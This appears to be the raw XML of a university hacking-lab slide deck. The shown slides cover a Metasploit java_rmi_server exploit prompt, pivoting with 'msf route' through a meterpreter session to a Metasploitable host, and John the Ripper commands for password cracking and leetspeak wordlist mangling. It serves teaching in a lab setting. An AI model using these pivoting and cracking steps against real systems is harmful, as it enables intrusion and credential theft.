              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>java_rmi_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1457441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msf route</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB5B7F1-9AF7-EB48-B687-5FE6523ABAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="955497" y="996217"/>
            <a:ext cx="7202184" cy="3329581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="569150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30012"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505176" y="2744475"/>
            <a:ext cx="8133648" cy="2325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quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf route</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="8572840" cy="1822771"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>You can look at your own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>TCPDump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> or the snippet below</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The first two highlighted lines show how we (10.10.0.10) are routing though the Windows meterpreter session (10.10.0.5)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The already exploited machine delivers the stager to metasploitable (10.10.0.20)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Last highlighted line shows the new victim making a new SYN connection to us!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The rest of the communication is us delivering the stage - Meterpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Typical firewall rules and even NAT allow outbound connections!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2619241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John the Ripper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="921704"/>
            <a:ext cx="4349470" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>John the Ripper is a multi-purpose tool for password cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We can also use it to help mangle our passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We will cover more of this tool the following week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>If we just call "john" from the command line, it will show us options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DAB6E8-7311-4E4F-8634-328257DA6F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154723" y="3844125"/>
            <a:ext cx="87578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0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Add john to your $PATH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings,Sans-Serif"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>$ echo "PATH=$PATH:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>" &gt;&gt; ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> &amp;&amp; source ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bashrc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" err="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings,Sans-Serif"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>In Kali 2020.4, we can run John without setting $PATH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193959B8-5449-4D41-8B7C-1CC191E202C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1236792"/>
            <a:ext cx="4287251" cy="1641367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2975339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John the Ripper - for password mangling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Cat our new password file. Pretty short!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Clear the screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>clear </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>john --wordlist:./lab9.lst --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>rules:single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This command will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>call John</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pass it our new wordlist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specify a mangling rule 'single'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tell it to print to stdout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can get a list of all rules available with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>john --list=rules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2135863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John the Ripper - for password mangling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using our small seed file and john, use a rule that mangles the dictionary entries into various forms of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>leetspeak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Converts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i -&gt; 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e -&gt; 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>uS1N' 0UR sm4Ll S33d F1L3 4nD J0Hn, UZ3 4 RUL3 TH@ m4NGl3z T3H d1cT10N4RY 3NTR13z 1nT0 v4R10Uz F0rMZ 0F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>l33t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sp33k</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626468041"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="nyu_labs_hac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yu_labs_hack" id="{7E7FE2BD-3C48-450A-992F-CF1B704B874C}" vid="{A46D607A-B76A-47A9-9DAB-3505B49EEF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nyu_labs_hack</Template>
  <TotalTime>29946</TotalTime>
  <Words>3506</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>537</Paragraphs>
  <Slides>67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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings,Sans-Serif</vt:lpstr>
      <vt:lpstr>nyu_labs_hack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New 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Jenna Bresnahan</dc:creator>
  <cp:lastModifiedBy>Peter Klabe</cp:lastModifiedBy>
  <cp:revision>993</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-03T13:03:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-27T03:12:43Z</dcterms:modified>
</cp:coreProperties>
</file>